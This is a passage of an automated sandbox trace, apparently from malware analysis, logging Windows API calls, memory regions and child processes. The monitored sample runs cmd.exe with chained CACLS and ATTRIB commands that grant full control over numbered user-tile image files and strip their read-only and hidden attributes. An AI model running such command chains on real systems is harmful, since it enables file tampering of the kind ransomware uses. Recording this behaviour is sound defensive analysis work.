wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0188.457] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0188.457] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f3cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f418 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"", lpProcessInformation=0x18f418*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc4, dwThreadId=0x7f4)) returned 1 [0188.458] CloseHandle (hObject=0x50) returned 1 [0188.458] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0188.458] GetEnvironmentStringsW () returned 0x2f2410* [0188.459] FreeEnvironmentStringsW (penv=0x2f2410) returned 1 [0188.459] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0188.516] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x18f30c | out: lpExitCode=0x18f30c*=0x0) returned 1 [0188.516] CloseHandle (hObject=0x4c) returned 1 [0188.516] _vsnwprintf (in: _Buffer=0x18f454, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f318 | out: _Buffer="00000000") returned 8 [0188.516] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0188.516] GetEnvironmentStringsW () returned 0x2f2410* [0188.516] FreeEnvironmentStringsW (penv=0x2f2410) returned 1 [0188.516] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.516] GetEnvironmentStringsW () returned 0x2f2410* [0188.516] FreeEnvironmentStringsW (penv=0x2f2410) returned 1 [0188.516] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f370 | out: lpAttributeList=0x18f370) [0188.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.516] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.516] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0188.517] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.517] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0188.517] SetConsoleInputExeNameW () returned 0x1 [0188.517] GetConsoleOutputCP () returned 0x1b5 [0188.517] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.517] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.517] exit (_Code=0) Process: id = "404" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c40" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "403" os_parent_pid = "0x84c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27353 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27354 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27355 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27356 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 27357 start_va = 0x1c0000 end_va = 0x1c8fff entry_point = 0x1c0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27358 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27359 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27360 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27361 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 27362 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27363 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27364 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27365 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27366 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 27367 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 27368 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27369 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27370 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27371 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27372 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27373 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27374 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 575 os_tid = 0x9c4 Thread: id = 576 os_tid = 0x130 Process: id = "405" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c40" os_pid = "0xc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "403" os_parent_pid = "0x84c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27375 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27376 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27377 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27378 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 27379 start_va = 0x980000 end_va = 0x986fff entry_point = 0x980000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27380 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27381 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27382 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27383 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 27384 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27385 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27386 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27387 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27388 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 27389 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 27390 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27391 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27392 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27393 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27394 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27395 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27396 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27397 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27398 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27399 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27400 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27401 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27402 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 27403 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27404 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 577 os_tid = 0x7f4 Process: id = "406" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x9c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27405 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27406 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27407 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27408 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 27409 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27410 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27411 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27412 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27413 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 27414 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27415 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27416 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27417 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 27418 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27419 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 27420 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27421 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27422 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27423 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27424 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27425 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27426 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27427 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27428 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27429 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 27430 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27431 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27432 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 27433 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 27434 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 27435 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 27436 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 27437 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 27438 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 27439 start_va = 0x1270000 end_va = 0x153efff entry_point = 0x1270000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 578 os_tid = 0x508 [0188.607] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afa8c | out: lpSystemTimeAsFileTime=0x1afa8c*(dwLowDateTime=0xa5521e20, dwHighDateTime=0x1d440a9)) [0188.607] GetCurrentProcessId () returned 0x9c8 [0188.607] GetCurrentThreadId () returned 0x508 [0188.607] GetTickCount () returned 0x35caf [0188.607] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa84 | out: lpPerformanceCount=0x1afa84*=24539653435) returned 1 [0188.608] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0188.608] __set_app_type (_Type=0x1) [0188.608] __p__fmode () returned 0x76b331f4 [0188.608] __p__commode () returned 0x76b331fc [0188.608] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0188.608] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0188.608] GetCurrentThreadId () returned 0x508 [0188.608] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x508) returned 0x38 [0188.608] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0188.608] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0188.608] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.609] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0188.609] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa1c | out: phkResult=0x1afa1c*=0x0) returned 0x2 [0188.609] VirtualQuery (in: lpAddress=0x1afa53, lpBuffer=0x1af9ec, dwLength=0x1c | out: lpBuffer=0x1af9ec*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0188.609] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af9ec, dwLength=0x1c | out: lpBuffer=0x1af9ec*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0188.609] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af9ec, dwLength=0x1c | out: lpBuffer=0x1af9ec*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0188.609] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af9ec, dwLength=0x1c | out: lpBuffer=0x1af9ec*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0188.609] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af9ec, dwLength=0x1c | out: lpBuffer=0x1af9ec*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0188.609] GetConsoleOutputCP () returned 0x1b5 [0188.609] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.609] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0188.609] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.609] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0188.609] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.609] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0188.609] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.609] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.610] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.610] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0188.610] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.610] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0188.610] GetEnvironmentStringsW () returned 0x300308* [0188.610] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0188.610] GetEnvironmentStringsW () returned 0x300308* [0188.610] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0188.610] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae98c | out: phkResult=0x1ae98c*=0x40) returned 0x0 [0188.610] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0xb8, lpcbData=0x1ae990*=0x1000) returned 0x2 [0188.610] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x1, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.610] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0x1, lpcbData=0x1ae990*=0x1000) returned 0x2 [0188.610] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x0, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.610] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x40, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x40, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0x40, lpcbData=0x1ae990*=0x1000) returned 0x2 